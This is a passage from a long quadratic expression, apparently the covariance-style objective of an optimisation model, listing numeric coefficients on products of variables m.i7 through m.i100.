+ 0.00551306*m.i7*m.i96 + 0.00524514*m.i7*m.i97 + 0.00715168*m.i7*m.i98 + 0.00269474*m.i7*m.i99
+ 0.006577*m.i7*m.i100 + 0.01497394*m.i8*m.i9 + 0.0108969*m.i8*m.i10 + 0.00659842*m.i8*m.i11 +
0.00635336*m.i8*m.i12 + 0.0313098*m.i8*m.i13 + 0.0387588*m.i8*m.i14 + 0.01963812*m.i8*m.i15 +
0.00587206*m.i8*m.i16 + 0.0158028*m.i8*m.i17 + 0.00433344*m.i8*m.i18 + 0.01027216*m.i8*m.i19 +
0.0310764*m.i8*m.i20 + 0.01480666*m.i8*m.i21 + 0.0292324*m.i8*m.i22 + 0.01097454*m.i8*m.i23 +
0.01637932*m.i8*m.i24 + 0.0081932*m.i8*m.i25 + 0.00625414*m.i8*m.i26 + 0.01206926*m.i8*m.i27 +
0.00960586*m.i8*m.i28 + 0.00767454*m.i8*m.i29 + 0.0389634*m.i8*m.i30 + 0.01047056*m.i8*m.i31 +
0.0243166*m.i8*m.i32 + 0.01490526*m.i8*m.i33 + 0.0048023*m.i8*m.i34 + 0.00582726*m.i8*m.i35 +
0.0310084*m.i8*m.i36 + 0.01520046*m.i8*m.i37 + 0.00435652*m.i8*m.i38 + 0.01820518*m.i8*m.i39 +
0.028962*m.i8*m.i40 + 0.0236162*m.i8*m.i41 + 0.0089807*m.i8*m.i42 + 0.01679084*m.i8*m.i43 +
0.01575264*m.i8*m.i44 - 0.00596962*m.i8*m.i45 + 0.0045504*m.i8*m.i46 + 0.0135935*m.i8*m.i47 +
0.00528224*m.i8*m.i48 + 0.01215584*m.i8*m.i49 + 0.01116408*m.i8*m.i50 + 0.00976906*m.i8*m.i51 +
0.01011206*m.i8*m.i52 + 0.0224104*m.i8*m.i53 + 0.01007602*m.i8*m.i54 + 0.01583128*m.i8*m.i55 +
0.00761084*m.i8*m.i56 + 0.00804396*m.i8*m.i57 + 0.01038608*m.i8*m.i58 + 0.01602498*m.i8*m.i59 +
0.00380248*m.i8*m.i60 + 0.0227414*m.i8*m.i61 + 0.0208778*m.i8*m.i62 + 0.01278874*m.i8*m.i63 +
0.00882622*m.i8*m.i64 + 0.01253422*m.i8*m.i65 + 0.00938202*m.i8*m.i66 + 0.0132364*m.i8*m.i67 +
0.00341364*m.i8*m.i68 + 0.0217686*m.i8*m.i69 + 0.01082106*m.i8*m.i70 + 0.0109575*m.i8*m.i71 +
0.01032418*m.i8*m.i72 + 0.01203924*m.i8*m.i73 + 0.01820078*m.i8*m.i74 + 0.00454846*m.i8*m.i75 +
0.00699592*m.i8*m.i76 + 0.017175*m.i8*m.i77 + 0.00418326*m.i8*m.i78 + 0.003044*m.i8*m.i79 +
0.00913958*m.i8*m.i80 + 0.01058642*m.i8*m.i81 + 0.00609436*m.i8*m.i82 + 0.00939194*m.i8*m.i83 +
0.01860882*m.i8*m.i84 + 0.00544766*m.i8*m.i85 + 0.00672898*m.i8*m.i86 + 0.00847128*m.i8*m.i87 +
0.0399532*m.i8*m.i88 + 0.00230258*m.i8*m.i89 + 0.00647968*m.i8*m.i90 + 0.00663734*m.i8*m.i91 +
0.00723392*m.i8*m.i92 + 0.0028363*m.i8*m.i93 + 0.01094692*m.i8*m.i94 + 0.01122622*m.i8*m.i95 +
0.01922686*m.i8*m.i96 + 0.0178042*m.i8*m.i97 + 0.00987488*m.i8*m.i98 + 0.0201768*m.i8*m.i99 +
0.00916962*m.i8*m.i100 + 0.00380196*m.i9*m.i10 + 0.000241806*m.i9*m.i11 + 0.00422182*m.i9*m.i12
+ 0.01745366*m.i9*m.i13 + 0.01560378*m.i9*m.i14 + 0.01797116*m.i9*m.i15 + 0.0104377*m.i9*m.i16
+ 0.01789532*m.i9*m.i17 + 0.0058031*m.i9*m.i18 + 0.00524852*m.i9*m.i19 + 0.0217664*m.i9*m.i20 +
0.0137801*m.i9*m.i21 + 0.00556924*m.i9*m.i22 + 0.00707894*m.i9*m.i23 + 0.00383446*m.i9*m.i24 +
0.00797136*m.i9*m.i25 + 0.00671112*m.i9*m.i26 + 0.00962638*m.i9*m.i27 + 0.00548282*m.i9*m.i28 +
0.00537842*m.i9*m.i29 + 0.01125578*m.i9*m.i30 + 0.01033708*m.i9*m.i31 + 0.01741482*m.i9*m.i32 +
0.01282666*m.i9*m.i33 + 0.00490948*m.i9*m.i34 + 0.00344028*m.i9*m.i35 + 0.01643714*m.i9*m.i36 +
0.00871578*m.i9*m.i37 + 0.002884*m.i9*m.i38 + 0.01596496*m.i9*m.i39 + 0.0171071*m.i9*m.i40 +
0.0282184*m.i9*m.i41 + 0.0157083*m.i9*m.i42 + 0.01908622*m.i9*m.i43 + 0.01887462*m.i9*m.i44 +
0.00621506*m.i9*m.i45 + 0.00706654*m.i9*m.i46 + 0.01685764*m.i9*m.i47 + 0.0046064*m.i9*m.i48 +
0.01393082*m.i9*m.i49 + 0.01366172*m.i9*m.i50 + 0.00974224*m.i9*m.i51 + 0.01117786*m.i9*m.i52 +
0.0105042*m.i9*m.i53 + 0.01603942*m.i9*m.i54 + 0.01154502*m.i9*m.i55 + 0.0187017*m.i9*m.i56 +
0.0063051*m.i9*m.i57 + 0.01180982*m.i9*m.i58 + 0.01148738*m.i9*m.i59 + 0.0045111*m.i9*m.i60 +
0.01782442*m.i9*m.i61 + 0.01261594*m.i9*m.i62 + 0.0275116*m.i9*m.i63 + 0.01370986*m.i9*m.i64 +
0.01301448*m.i9*m.i65 + 0.00909146*m.i9*m.i66 + 0.00880956*m.i9*m.i67 + 0.00542126*m.i9*m.i68 +
0.0173699*m.i9*m.i69 + 0.0063573*m.i9*m.i70 + 0.01464082*m.i9*m.i71 + 0.01030184*m.i9*m.i72 +
0.01342364*m.i9*m.i73 + 0.01050302*m.i9*m.i74 + 0.00580926*m.i9*m.i75 + 0.00669824*m.i9*m.i76 +
0.0154461*m.i9*m.i77 + 0.00331996*m.i9*m.i78 - 0.00117976*m.i9*m.i79 + 0.0134427*m.i9*m.i80 +
0.01200946*m.i9*m.i81 + 0.00261992*m.i9*m.i82 + 0.01802554*m.i9*m.i83 + 0.01281546*m.i9*m.i84 +
0.00817562*m.i9*m.i85 + 0.01353278*m.i9*m.i86 + 0.0065419*m.i9*m.i87 + 0.0287756*m.i9*m.i88 +
0.00438656*m.i9*m.i89 + 0.006514*m.i9*m.i90 + 0.00948704*m.i9*m.i91 + 0.01460712*m.i9*m.i92 +
0.00442406*m.i9*m.i93 + 0.00525338*m.i9*m.i94 + 0.01080594*m.i9*m.i95 + 0.007284*m.i9*m.i96 +
0.01145784*m.i9*m.i97 + 0.01167366*m.i9*m.i98 + 0.01306896*m.i9*m.i99 + 0.01230056*m.i9*m.i100 +
0.00390108*m.i10*m.i11 + 0.00306506*m.i10*m.i12 + 0.0266658*m.i10*m.i13 + 0.027667*m.i10*m.i14 +
0.01278752*m.i10*m.i15 + 0.01031474*m.i10*m.i16 + 0.01126594*m.i10*m.i17 + 0.00489102*m.i10*m.i18
+ 0.00513038*m.i10*m.i19 + 0.01899656*m.i10*m.i20 + 0.01116072*m.i10*m.i21 + 0.0218888*m.i10*
m.i22 + 0.01101148*m.i10*m.i23 + 0.00938786*m.i10*m.i24 + 0.00495956*m.i10*m.i25 + 0.00409492*
m.i10*m.i26 + 0.00774196*m.i10*m.i27 + 0.00563678*m.i10*m.i28 + 0.00452506*m.i10*m.i29 +
0.0234496*m.i10*m.i30 + 0.00879878*m.i10*m.i31 + 0.01816086*m.i10*m.i32 + 0.01204676*m.i10*m.i33
+ 0.00474448*m.i10*m.i34 + 0.00478426*m.i10*m.i35 + 0.0297012*m.i10*m.i36 + 0.0151832*m.i10*
m.i37 + 0.00256504*m.i10*m.i38 + 0.01482468*m.i10*m.i39 + 0.0351312*m.i10*m.i40 + 0.00722204*
m.i10*m.i41 + 0.00911442*m.i10*m.i42 + 0.00459148*m.i10*m.i43 + 0.00643892*m.i10*m.i44 +
0.00232242*m.i10*m.i45 + 0.00525016*m.i10*m.i46 + 0.00918898*m.i10*m.i47 + 0.00604914*m.i10*m.i48
+ 0.00855226*m.i10*m.i49 + 0.01758968*m.i10*m.i50 + 0.00905476*m.i10*m.i51 + 0.0076611*m.i10*
m.i52 + 0.01159398*m.i10*m.i53 + 0.00933998*m.i10*m.i54 + 0.00932956*m.i10*m.i55 + 0.0077777*
m.i10*m.i56 + 0.00585234*m.i10*m.i57 + 0.00494612*m.i10*m.i58 + 0.01267098*m.i10*m.i59 +
0.0025072*m.i10*m.i60 + 0.01652258*m.i10*m.i61 + 0.0113132*m.i10*m.i62 + 0.00647572*m.i10*m.i63
+ 0.00509638*m.i10*m.i64 + 0.00796924*m.i10*m.i65 + 0.00671784*m.i10*m.i66 + 0.00876736*m.i10*
m.i67 + 0.00330284*m.i10*m.i68 + 0.0143256*m.i10*m.i69 + 0.00658518*m.i10*m.i70 + 0.00751304*
m.i10*m.i71 + 0.00447272*m.i10*m.i72 + 0.00707326*m.i10*m.i73 + 0.01022514*m.i10*m.i74 +
0.00629098*m.i10*m.i75 + 0.00437386*m.i10*m.i76 + 0.0069722*m.i10*m.i77 + 0.00631338*m.i10*m.i78
+ 0.01475202*m.i10*m.i79 + 0.00722624*m.i10*m.i80 + 0.00973154*m.i10*m.i81 + 0.00371556*m.i10*
m.i82 + 0.00253096*m.i10*m.i83 + 0.008833*m.i10*m.i84 + 0.00871744*m.i10*m.i85 + 0.0101816*m.i10*
m.i86 + 0.01000738*m.i10*m.i87 + 0.01974334*m.i10*m.i88 + 0.00587674*m.i10*m.i89 + 0.0124516*
m.i10*m.i90 + 0.00915752*m.i10*m.i91 + 0.00913708*m.i10*m.i92 + 0.00200378*m.i10*m.i93 +
0.00536928*m.i10*m.i94 + 0.00823672*m.i10*m.i95 + 0.01736144*m.i10*m.i96 + 0.01105742*m.i10*m.i97
+ 0.01023842*m.i10*m.i98 + 0.01685104*m.i10*m.i99 + 0.01457986*m.i10*m.i100 + 0.000833086*m.i11*
m.i12 + 0.00999478*m.i11*m.i13 + 0.01344484*m.i11*m.i14 + 0.0031808*m.i11*m.i15 + 0.01117228*
m.i11*m.i16 + 0.000697152*m.i11*m.i17 + 0.000585828*m.i11*m.i18 + 0.00585952*m.i11*m.i19 +
0.00859976*m.i11*m.i20 + 0.00502902*m.i11*m.i21 + 0.00447154*m.i11*m.i22 + 0.001969568*m.i11*
m.i23 + 0.0049358*m.i11*m.i24 - 0.00029705*m.i11*m.i25 + 0.0008833*m.i11*m.i26 + 0.00788936*m.i11
*m.i27 + 0.00223564*m.i11*m.i28 - 0.001370818*m.i11*m.i29 + 0.0148367*m.i11*m.i30 + 0.01084338*
m.i11*m.i31 + 0.000606756*m.i11*m.i32 + 0.00591896*m.i11*m.i33 - 0.00408456*m.i11*m.i34 -
0.002724*m.i11*m.i35 + 0.01495302*m.i11*m.i36 + 0.0001528802*m.i11*m.i37 + 0.000200858*m.i11*
m.i38 + 0.00843216*m.i11*m.i39 + 0.01341476*m.i11*m.i40 + 0.01160686*m.i11*m.i41 + 0.00464728*
m.i11*m.i42 + 0.00803576*m.i11*m.i43 + 0.00270742*m.i11*m.i44 - 0.00352162*m.i11*m.i45 +
0.000947796*m.i11*m.i46 + 0.00388898*m.i11*m.i47 + 0.00557236*m.i11*m.i48 + 0.00208008*m.i11*
m.i49 + 0.000931698*m.i11*m.i50 + 0.000654446*m.i11*m.i51 + 0.00650504*m.i11*m.i52 + 0.000501194*
m.i11*m.i53 + 0.00681518*m.i11*m.i54 + 0.00601122*m.i11*m.i55 - 0.00507122*m.i11*m.i56 +
0.000483176*m.i11*m.i57 + 0.00482018*m.i11*m.i58 + 0.0064067*m.i11*m.i59 - 0.000166498*m.i11*
m.i60 + 0.00575774*m.i11*m.i61 + 0.00725456*m.i11*m.i62 + 0.00219412*m.i11*m.i63 + 0.0084673*
m.i11*m.i64 + 0.000333436*m.i11*m.i65 + 0.00655332*m.i11*m.i66 - 0.00257168*m.i11*m.i67 +
0.01199786*m.i11*m.i68 + 0.0059299*m.i11*m.i69 + 0.001843394*m.i11*m.i70 + 0.01060724*m.i11*m.i71
+ 0.00647206*m.i11*m.i72 + 0.00231676*m.i11*m.i73 + 0.00580344*m.i11*m.i74 + 0.00620538*m.i11*
m.i75 - 0.000334258*m.i11*m.i76 + 0.00656424*m.i11*m.i77 - 0.001286316*m.i11*m.i78 + 0.00546106*
m.i11*m.i79 - 0.000202642*m.i11*m.i80 + 0.00426114*m.i11*m.i81 - 0.00204892*m.i11*m.i82 +
0.01117602*m.i11*m.i83 + 0.01034244*m.i11*m.i84 + 0.00449542*m.i11*m.i85 + 0.00797378*m.i11*m.i86
- 0.000792844*m.i11*m.i87 + 0.01939124*m.i11*m.i88 + 0.00432784*m.i11*m.i89 + 0.00204578*m.i11*
m.i90 + 0.021152*m.i11*m.i91 + 0.00283286*m.i11*m.i92 - 0.00407532*m.i11*m.i93 - 0.001198622*
m.i11*m.i94 + 0.0056114*m.i11*m.i95 + 0.00560696*m.i11*m.i96 + 0.00867776*m.i11*m.i97 +
0.01208222*m.i11*m.i98 + 0.00209588*m.i11*m.i99 + 0.0061276*m.i11*m.i100 + 0.00580036*m.i12*m.i13
+ 0.01674486*m.i12*m.i14 + 0.00758412*m.i12*m.i15 + 0.0061097*m.i12*m.i16 + 0.00406024*m.i12*
m.i17 + 0.00246134*m.i12*m.i18 + 0.00422294*m.i12*m.i19 + 0.00359302*m.i12*m.i20 + 0.0027503*
m.i12*m.i21 + 0.01042736*m.i12*m.i22 + 0.001094158*m.i12*m.i23 + 0.00410122*m.i12*m.i24 +
0.0025257*m.i12*m.i25 + 0.00319626*m.i12*m.i26 + 0.00241386*m.i12*m.i27 + 0.001365712*m.i12*m.i28
+ 0.00285332*m.i12*m.i29 + 0.01617908*m.i12*m.i30 + 0.00231724*m.i12*m.i31 + 0.00343892*m.i12*
m.i32 + 0.00256516*m.i12*m.i33 + 0.001014308*m.i12*m.i34 + 0.001643396*m.i12*m.i35 + 0.00879946*
m.i12*m.i36 + 0.00422942*m.i12*m.i37 + 0.001108756*m.i12*m.i38 + 0.0068803*m.i12*m.i39 -
0.00375268*m.i12*m.i40 + 0.0029422*m.i12*m.i41 + 0.00429146*m.i12*m.i42 + 0.00277958*m.i12*m.i43
+ 0.00284814*m.i12*m.i44 + 0.001633544*m.i12*m.i45 + 0.00422296*m.i12*m.i46 + 0.000606884*m.i12*
m.i47 + 0.0041981*m.i12*m.i48 + 0.00378962*m.i12*m.i49 + 0.00842602*m.i12*m.i50 + 0.002132*m.i12*
m.i51 + 0.00482062*m.i12*m.i52 + 0.00806126*m.i12*m.i53 + 0.00387284*m.i12*m.i54 + 0.0039366*
m.i12*m.i55 + 0.000612768*m.i12*m.i56 + 0.0044852*m.i12*m.i57 + 0.00284844*m.i12*m.i58 +
0.00336708*m.i12*m.i59 + 0.0030099*m.i12*m.i60 + 0.00693418*m.i12*m.i61 + 0.0046908*m.i12*m.i62
+ 0.00538386*m.i12*m.i63 + 0.00560854*m.i12*m.i64 + 0.00360994*m.i12*m.i65 + 0.00317544*m.i12*
m.i66 + 0.00443286*m.i12*m.i67 + 0.00420074*m.i12*m.i68 + 0.00506986*m.i12*m.i69 + 0.00415464*
m.i12*m.i70 + 0.00220046*m.i12*m.i71 + 0.00230386*m.i12*m.i72 + 0.00311708*m.i12*m.i73 +
0.00731294*m.i12*m.i74 + 0.0048156*m.i12*m.i75 + 0.00332812*m.i12*m.i76 + 0.00439802*m.i12*m.i77
+ 0.00371872*m.i12*m.i78 + 0.00601328*m.i12*m.i79 + 0.00749754*m.i12*m.i80 + 0.00280082*m.i12*
m.i81 + 0.00202854*m.i12*m.i82 + 0.001389608*m.i12*m.i83 + 0.00387764*m.i12*m.i84 + 0.00354982*
m.i12*m.i85 + 0.00265444*m.i12*m.i86 + 0.0022211*m.i12*m.i87 + 0.00666916*m.i12*m.i88 +
0.00412408*m.i12*m.i89 + 0.00421336*m.i12*m.i90 + 0.00306034*m.i12*m.i91 + 0.00210254*m.i12*m.i92
+ 0.001819242*m.i12*m.i93 + 0.0007903*m.i12*m.i94 + 0.00409078*m.i12*m.i95 + 0.00988156*m.i12*
m.i96 + 0.00522182*m.i12*m.i97 + 0.00482098*m.i12*m.i98 + 0.0042136*m.i12*m.i99 + 0.00408986*
m.i12*m.i100 + 0.0674968*m.i13*m.i14 + 0.0344974*m.i13*m.i15 + 0.0330226*m.i13*m.i16 + 0.0319354*
m.i13*m.i17 + 0.01218366*m.i13*m.i18 + 0.00519196*m.i13*m.i19 + 0.044536*m.i13*m.i20 + 0.0277772*
m.i13*m.i21 + 0.0622606*m.i13*m.i22 + 0.0259408*m.i13*m.i23 + 0.0302608*m.i13*m.i24 + 0.0163455*
m.i13*m.i25 + 0.0077583*m.i13*m.i26 + 0.0227636*m.i13*m.i27 + 0.01173702*m.i13*m.i28 + 0.00769116
*m.i13*m.i29 + 0.0709126*m.i13*m.i30 + 0.01974624*m.i13*m.i31 + 0.0471936*m.i13*m.i32 + 0.0320402
*m.i13*m.i33 + 0.0107856*m.i13*m.i34 + 0.00663924*m.i13*m.i35 + 0.0963608*m.i13*m.i36 + 0.0383208
*m.i13*m.i37 + 0.00629602*m.i13*m.i38 + 0.0436584*m.i13*m.i39 + 0.113305*m.i13*m.i40 + 0.030603*
m.i13*m.i41 + 0.0334486*m.i13*m.i42 + 0.0221094*m.i13*m.i43 + 0.0261022*m.i13*m.i44 + 0.00384036*
m.i13*m.i45 + 0.01393368*m.i13*m.i46 + 0.0390862*m.i13*m.i47 + 0.01408516*m.i13*m.i48 + 0.0200136
*m.i13*m.i49 + 0.0473844*m.i13*m.i50 + 0.0233922*m.i13*m.i51 + 0.0267544*m.i13*m.i52 + 0.0382128*
m.i13*m.i53 + 0.026998*m.i13*m.i54 + 0.0232812*m.i13*m.i55 + 0.0210468*m.i13*m.i56 + 0.01155576*
m.i13*m.i57 + 0.01460704*m.i13*m.i58 + 0.0315638*m.i13*m.i59 + 0.00606798*m.i13*m.i60 + 0.048913*
m.i13*m.i61 + 0.0422528*m.i13*m.i62 + 0.0227364*m.i13*m.i63 + 0.0218176*m.i13*m.i64 + 0.020181*
m.i13*m.i65 + 0.0171918*m.i13*m.i66 + 0.0231896*m.i13*m.i67 + 0.00653966*m.i13*m.i68 + 0.0386908*
m.i13*m.i69 + 0.01310368*m.i13*m.i70 + 0.0233574*m.i13*m.i71 + 0.01370986*m.i13*m.i72 +
0.01644046*m.i13*m.i73 + 0.0239108*m.i13*m.i74 + 0.01209114*m.i13*m.i75 + 0.00733894*m.i13*m.i76
+ 0.01831752*m.i13*m.i77 + 0.01361596*m.i13*m.i78 + 0.0349392*m.i13*m.i79 + 0.01738086*m.i13*
m.i80 + 0.0327952*m.i13*m.i81 + 0.00370036*m.i13*m.i82 + 0.0275306*m.i13*m.i83 + 0.0237408*m.i13*
m.i84 + 0.023854*m.i13*m.i85 + 0.0298082*m.i13*m.i86 + 0.01954408*m.i13*m.i87 + 0.0427146*m.i13*
m.i88 + 0.00800344*m.i13*m.i89 + 0.0379614*m.i13*m.i90 + 0.0237386*m.i13*m.i91 + 0.0280402*m.i13*
m.i92 + 0.00539152*m.i13*m.i93 + 0.00878456*m.i13*m.i94 + 0.0258544*m.i13*m.i95 + 0.0525716*m.i13
*m.i96 + 0.0324866*m.i13*m.i97 + 0.03178*m.i13*m.i98 + 0.0440898*m.i13*m.i99 + 0.0425102*m.i13*
m.i100 + 0.0526828*m.i14*m.i15 + 0.037439*m.i14*m.i16 + 0.0256328*m.i14*m.i17 + 0.0100326*m.i14*
m.i18 + 0.02287*m.i14*m.i19 + 0.05764*m.i14*m.i20 + 0.0305304*m.i14*m.i21 + 0.0790588*m.i14*m.i22
+ 0.0273134*m.i14*m.i23 + 0.0226144*m.i14*m.i24 + 0.01919436*m.i14*m.i25 + 0.01634394*m.i14*
m.i26 + 0.0200216*m.i14*m.i27 + 0.01187024*m.i14*m.i28 + 0.0175096*m.i14*m.i29 + 0.1303416*m.i14*
m.i30 + 0.01783484*m.i14*m.i31 + 0.0483706*m.i14*m.i32 + 0.0389666*m.i14*m.i33 + 0.00488422*m.i14
*m.i34 + 0.01045608*m.i14*m.i35 + 0.0811654*m.i14*m.i36 + 0.0367626*m.i14*m.i37 + 0.00522434*
m.i14*m.i38 + 0.05055*m.i14*m.i39 + 0.0849278*m.i14*m.i40 + 0.0341058*m.i14*m.i41 + 0.029549*
m.i14*m.i42 + 0.0119177*m.i14*m.i43 + 0.034956*m.i14*m.i44 + 0.0084943*m.i14*m.i45 + 0.01853266*
m.i14*m.i46 + 0.01893124*m.i14*m.i47 + 0.0205662*m.i14*m.i48 + 0.0326974*m.i14*m.i49 + 0.0610942*
m.i14*m.i50 + 0.0265816*m.i14*m.i51 + 0.0345152*m.i14*m.i52 + 0.0602904*m.i14*m.i53 + 0.0299894*
m.i14*m.i54 + 0.029724*m.i14*m.i55 + 0.00991024*m.i14*m.i56 + 0.0212834*m.i14*m.i57 + 0.01611994*
m.i14*m.i58 + 0.0349608*m.i14*m.i59 + 0.01544524*m.i14*m.i60 + 0.0660828*m.i14*m.i61 + 0.0517844*
m.i14*m.i62 + 0.0288716*m.i14*m.i63 + 0.02065*m.i14*m.i64 + 0.0285834*m.i14*m.i65 + 0.01348302*
m.i14*m.i66 + 0.0306592*m.i14*m.i67 + 0.01828946*m.i14*m.i68 + 0.0537368*m.i14*m.i69 + 0.0271944*
m.i14*m.i70 + 0.01793364*m.i14*m.i71 + 0.0206146*m.i14*m.i72 + 0.0281438*m.i14*m.i73 + 0.038653*
m.i14*m.i74 + 0.0322466*m.i14*m.i75 + 0.0212534*m.i14*m.i76 + 0.0336072*m.i14*m.i77 + 0.01910646*
m.i14*m.i78 + 0.0653414*m.i14*m.i79 + 0.0269972*m.i14*m.i80 + 0.0273492*m.i14*m.i81 + 0.01038358*
m.i14*m.i82 + 0.00619204*m.i14*m.i83 + 0.0273406*m.i14*m.i84 + 0.0211516*m.i14*m.i85 + 0.0382364*
m.i14*m.i86 + 0.0345294*m.i14*m.i87 + 0.1230516*m.i14*m.i88 + 0.032645*m.i14*m.i89 + 0.0494242*
m.i14*m.i90 + 0.030464*m.i14*m.i91 + 0.0229316*m.i14*m.i92 + 0.01328606*m.i14*m.i93 + 0.01219994*
m.i14*m.i94 + 0.0308436*m.i14*m.i95 + 0.0853596*m.i14*m.i96 + 0.0354032*m.i14*m.i97 + 0.0262134*
m.i14*m.i98 + 0.0473304*m.i14*m.i99 + 0.037143*m.i14*m.i100 + 0.01723066*m.i15*m.i16 + 0.0144032*
m.i15*m.i17 + 0.01011568*m.i15*m.i18 + 0.01071386*m.i15*m.i19 + 0.0363128*m.i15*m.i20 + 0.0200062
*m.i15*m.i21 + 0.0429276*m.i15*m.i22 + 0.01550086*m.i15*m.i23 + 0.01336936*m.i15*m.i24 +
0.01153424*m.i15*m.i25 + 0.01291552*m.i15*m.i26 + 0.01571376*m.i15*m.i27 + 0.0057752*m.i15*m.i28
+ 0.01132328*m.i15*m.i29 + 0.04615*m.i15*m.i30 + 0.0095472*m.i15*m.i31 + 0.0348208*m.i15*m.i32
+ 0.01999334*m.i15*m.i33 + 0.00687142*m.i15*m.i34 + 0.00887602*m.i15*m.i35 + 0.0412134*m.i15*
m.i36 + 0.0222294*m.i15*m.i37 + 0.0044452*m.i15*m.i38 + 0.0275012*m.i15*m.i39 + 0.0449902*m.i15*
m.i40 + 0.0316194*m.i15*m.i41 + 0.021335*m.i15*m.i42 + 0.01203424*m.i15*m.i43 + 0.0250958*m.i15*
m.i44 + 0.00747774*m.i15*m.i45 + 0.01208838*m.i15*m.i46 + 0.0258298*m.i15*m.i47 + 0.01217868*
m.i15*m.i48 + 0.0181139*m.i15*m.i49 + 0.0324096*m.i15*m.i50 + 0.01156602*m.i15*m.i51 + 0.01869794
*m.i15*m.i52 + 0.0276488*m.i15*m.i53 + 0.0230496*m.i15*m.i54 + 0.0171536*m.i15*m.i55 + 0.01527606
*m.i15*m.i56 + 0.01288824*m.i15*m.i57 + 0.014014*m.i15*m.i58 + 0.01657292*m.i15*m.i59 + 0.0080112
*m.i15*m.i60 + 0.0380938*m.i15*m.i61 + 0.0298954*m.i15*m.i62 + 0.0218266*m.i15*m.i63 + 0.01580514
*m.i15*m.i64 + 0.01327226*m.i15*m.i65 + 0.01171988*m.i15*m.i66 + 0.01749552*m.i15*m.i67 +
0.00958228*m.i15*m.i68 + 0.02991*m.i15*m.i69 + 0.01687722*m.i15*m.i70 + 0.0214718*m.i15*m.i71 +
0.0177952*m.i15*m.i72 + 0.01429134*m.i15*m.i73 + 0.01835742*m.i15*m.i74 + 0.014413*m.i15*m.i75 +
0.01215492*m.i15*m.i76 + 0.01888264*m.i15*m.i77 + 0.01135654*m.i15*m.i78 + 0.01419354*m.i15*m.i79
+ 0.01589948*m.i15*m.i80 + 0.01996746*m.i15*m.i81 + 0.00616376*m.i15*m.i82 + 0.00905236*m.i15*
m.i83 + 0.01329424*m.i15*m.i84 + 0.01265054*m.i15*m.i85 + 0.01743812*m.i15*m.i86 + 0.01662354*
m.i15*m.i87 + 0.0326642*m.i15*m.i88 + 0.00648876*m.i15*m.i89 + 0.0255582*m.i15*m.i90 + 0.01710528
*m.i15*m.i91 + 0.01530604*m.i15*m.i92 + 0.00729364*m.i15*m.i93 + 0.00786908*m.i15*m.i94 +
0.0169034*m.i15*m.i95 + 0.034265*m.i15*m.i96 + 0.0206426*m.i15*m.i97 + 0.01574576*m.i15*m.i98 +
0.0251768*m.i15*m.i99 + 0.0302234*m.i15*m.i100 + 0.0180502*m.i16*m.i17 + 0.00797572*m.i16*m.i18
+ 0.00993386*m.i16*m.i19 + 0.0236072*m.i16*m.i20 + 0.01425014*m.i16*m.i21 + 0.0269392*m.i16*
m.i22 + 0.01322908*m.i16*m.i23 + 0.01719786*m.i16*m.i24 + 0.00995474*m.i16*m.i25 + 0.00544834*
m.i16*m.i26 + 0.01319632*m.i16*m.i27 + 0.00695148*m.i16*m.i28 + 0.00568042*m.i16*m.i29 + 0.045082
*m.i16*m.i30 + 0.01190474*m.i16*m.i31 + 0.01955462*m.i16*m.i32 + 0.0138212*m.i16*m.i33 +
0.00642106*m.i16*m.i34 + 0.00665524*m.i16*m.i35 + 0.0380492*m.i16*m.i36 + 0.01602708*m.i16*m.i37
+ 0.00369958*m.i16*m.i38 + 0.0220792*m.i16*m.i39 + 0.0304262*m.i16*m.i40 + 0.01843444*m.i16*
m.i41 + 0.021247*m.i16*m.i42 + 0.01518988*m.i16*m.i43 + 0.01406774*m.i16*m.i44 + 0.0051723*m.i16*
m.i45 + 0.0080675*m.i16*m.i46 + 0.0176419*m.i16*m.i47 + 0.0090298*m.i16*m.i48 + 0.0126196*m.i16*
m.i49 + 0.025967*m.i16*m.i50 + 0.01140228*m.i16*m.i51 + 0.01900414*m.i16*m.i52 + 0.01781402*m.i16
*m.i53 + 0.0194748*m.i16*m.i54 + 0.01211848*m.i16*m.i55 + 0.01166912*m.i16*m.i56 + 0.00870972*
m.i16*m.i57 + 0.00719416*m.i16*m.i58 + 0.01574372*m.i16*m.i59 + 0.00725944*m.i16*m.i60 +
0.0294988*m.i16*m.i61 + 0.0260914*m.i16*m.i62 + 0.01974094*m.i16*m.i63 + 0.01434116*m.i16*m.i64
+ 0.00954816*m.i16*m.i65 + 0.0087947*m.i16*m.i66 + 0.01216302*m.i16*m.i67 + 0.01307338*m.i16*
m.i68 + 0.023669*m.i16*m.i69 + 0.01061826*m.i16*m.i70 + 0.01531198*m.i16*m.i71 + 0.01282252*m.i16
*m.i72 + 0.01136194*m.i16*m.i73 + 0.01289612*m.i16*m.i74 + 0.0111961*m.i16*m.i75 + 0.00467394*
m.i16*m.i76 + 0.0120207*m.i16*m.i77 + 0.00634502*m.i16*m.i78 + 0.0272842*m.i16*m.i79 + 0.01354848
*m.i16*m.i80 + 0.01491878*m.i16*m.i81 + 0.00372788*m.i16*m.i82 + 0.01347184*m.i16*m.i83 +
0.01367452*m.i16*m.i84 + 0.01430584*m.i16*m.i85 + 0.01662228*m.i16*m.i86 + 0.01019354*m.i16*m.i87
+ 0.031864*m.i16*m.i88 + 0.01389622*m.i16*m.i89 + 0.01404588*m.i16*m.i90 + 0.01898344*m.i16*
m.i91 + 0.01310136*m.i16*m.i92 + 0.00293122*m.i16*m.i93 + 0.00548746*m.i16*m.i94 + 0.01674526*
m.i16*m.i95 + 0.0263504*m.i16*m.i96 + 0.0187966*m.i16*m.i97 + 0.0198675*m.i16*m.i98 + 0.0160833*
m.i16*m.i99 + 0.01885334*m.i16*m.i100 + 0.00599666*m.i17*m.i18 + 0.0047675*m.i17*m.i19 +
0.0265872*m.i17*m.i20 + 0.01628802*m.i17*m.i21 + 0.01871884*m.i17*m.i22 + 0.01233104*m.i17*m.i23
+ 0.01365522*m.i17*m.i24 + 0.00989432*m.i17*m.i25 + 0.00330258*m.i17*m.i26 + 0.0116841*m.i17*
m.i27 + 0.0079471*m.i17*m.i28 + 0.0045994*m.i17*m.i29 + 0.0254766*m.i17*m.i30 + 0.01659406*m.i17*
m.i31 + 0.0220846*m.i17*m.i32 + 0.01861566*m.i17*m.i33 + 0.00948066*m.i17*m.i34 + 0.0090429*m.i17
*m.i35 + 0.0337978*m.i17*m.i36 + 0.01595384*m.i17*m.i37 + 0.00235078*m.i17*m.i38 + 0.0201494*
m.i17*m.i39 + 0.0342284*m.i17*m.i40 + 0.0277738*m.i17*m.i41 + 0.01731318*m.i17*m.i42 + 0.01753214
*m.i17*m.i43 + 0.01978996*m.i17*m.i44 + 0.00369934*m.i17*m.i45 + 0.00718436*m.i17*m.i46 +
